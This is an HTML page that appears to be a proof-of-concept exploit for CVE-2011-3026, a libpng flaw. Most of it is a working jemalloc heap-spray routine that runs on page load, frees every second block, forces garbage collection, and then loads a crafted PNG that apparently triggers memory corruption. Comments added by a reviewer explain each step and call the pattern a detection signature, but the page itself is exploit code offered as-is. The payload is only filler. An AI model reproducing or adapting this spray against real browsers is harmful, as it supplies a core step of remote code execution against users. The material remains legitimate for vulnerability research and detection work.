<html>
<head>
<script>

/**
 * Heap-spray primitive used by this proof of concept.
 *
 * Fills the browser heap with `blocks` JavaScript strings that all share the
 * same layout (marker + content + random padding), then frees every second
 * one and forces a garbage collection so the heap ends up with holes between
 * attacker-controlled blocks. The memory-corruption trigger itself is NOT in
 * this function; on this page it is presumably the PNG referenced in <body>
 * (cve-2011-3026.png) — confirm against the image file.
 *
 * Defensive note: the combination seen here — unescape("%u....") constants,
 * exponential string-doubling loops, an array of thousands of identical
 * strings, alternate-slot frees, and a mass-allocation GC trigger — is a
 * well-known heap-spray signature that browser exploit-detection and
 * content-scanning tooling keys on.
 *
 * @param {number} blocks  number of spray blocks to allocate
 * @param {number} size    target block size; halved below (presumably because
 *                         JS strings are 2 bytes per UTF-16 unit — confirm)
 * @returns {Array<string|null>} the spray array (every even index nulled)
 */
function jemalloc_spray(blocks, size)
{
    // Copyright (c) 2012 Patroklos Argyroudis <argp at domain census-labs.com>
    // Copyright (c) 2012 Chariton Karamitas <huku at domain census-labs.com>
    // Copyright (c) 2012 Census, Inc. (http://www.census-labs.com/)

    // block length in string characters (size is expressed in bytes)
    var block_size = size / 2;

    // rop/bootstrap/whatever
    // Recognisable 8-character marker placed at the start of every block;
    // a value that shows up in a crash dump identifies a sprayed block.
    var marker = unescape("%ubeef%udead");
    marker += marker;

    // shellcode/payload
    // Here only a filler pattern (0x6666...) — no real payload is shipped in
    // this PoC; it is doubled until it is a quarter of the block.
    var content = unescape("%u6666%u6666");

    while(content.length < (block_size / 2))
    {
        content += content;
    }

    var arr = [];

    // NOTE(review): `i` is never declared with var/let, so it leaks as a
    // global and is shared with trigger_gc() below.
    for(i = 0; i < blocks; i++)
    {
        // construct the random block padding (corelanc0d3r's trick)
        // Four values in 0..15, concatenated as decimal strings, so the
        // resulting %u escape sequences (and thus the padding) vary per block.
        var rnd1 = Math.floor(Math.random() * 1000) % 16;
        var rnd2 = Math.floor(Math.random() * 1000) % 16;
        var rnd3 = Math.floor(Math.random() * 1000) % 16;
        var rnd4 = Math.floor(Math.random() * 1000) % 16;

        var rndstr = "%u" + rnd1.toString() + rnd2.toString();
        rndstr += "%u" + rnd3.toString() + rnd4.toString();

        var padding = unescape(rndstr);
        
        // grow the padding until marker + content + padding reaches block_size
        while(padding.length < block_size - marker.length - content.length)
        {
            padding += padding;
        }

        // construct the block
        var block = marker + content + padding;

        // if required repeat the block
        while(block.length < block_size)
        {
            block += block;
        }

        // spray block
        // substr(0) presumably forces a fresh flat copy of the string rather
        // than a reference to the concatenation result — engine-specific,
        // confirm before relying on it.
        arr[i] = block.substr(0);
    }

    // for debugging
    // Presumably a no-op marker call used as a breakpoint location in an
    // instrumented engine; it has no effect on the spray. TODO confirm.
    Math.asin(1);

    // Release every second block so the heap contains holes of block_size
    // between sprayed blocks; both the delete and the null assignment drop
    // the only reference.
    for(i = 0; i < blocks; i += 2)
    {
        delete(arr[i]);
        arr[i] = null;
    }

    // trigger_gc() allocates 100000 arrays so the freed blocks are actually
    // reclaimed; its return value is only used for the debugging alert.
    var ret = trigger_gc();

    alert("After garbage collection: " + ret.length);

    // for debugging
    // Second no-op marker call, see Math.asin(1) above.
    Math.atan2(6, 6);

    return arr;
}

/**
 * Forces a garbage-collection pass by allocation pressure: creates 100000
 * empty arrays in a row and returns them.
 *
 * There is no direct GC API in the browser, so the PoC relies on this burst
 * of allocations to make the engine collect the blocks freed by
 * jemalloc_spray(). Whether a collection actually occurs is engine- and
 * heap-state-dependent — not guaranteed by this code.
 *
 * Defensive note: a tight loop allocating tens of thousands of empty arrays
 * is itself a common heap-spray/GC-trigger idiom worth flagging.
 *
 * @returns {Array<Array>} the 100000 allocated arrays (kept alive by the
 *                         caller only as long as it holds the return value)
 */
function trigger_gc()
{
    var gc = [];
    
    // NOTE(review): `i` is undeclared here too and is the same implicit
    // global that jemalloc_spray() uses.
    for(i = 0; i < 100000; i++)
    {
        gc[i] = new Array();
    }

    return gc;
}

// 1000 spray blocks of size 630 (target run size: 1024)
// Runs at page load, before the <body> (and the PNG it references) is
// parsed; `foo` is kept as a global so the sprayed strings stay reachable
// and are not collected.
var foo = jemalloc_spray(1000, 630);

// alert(foo.length);

</script>
</head>

<body>
CVE-2011-3026 is fun
<p><img src="cve-2011-3026.png">
</body>
</html>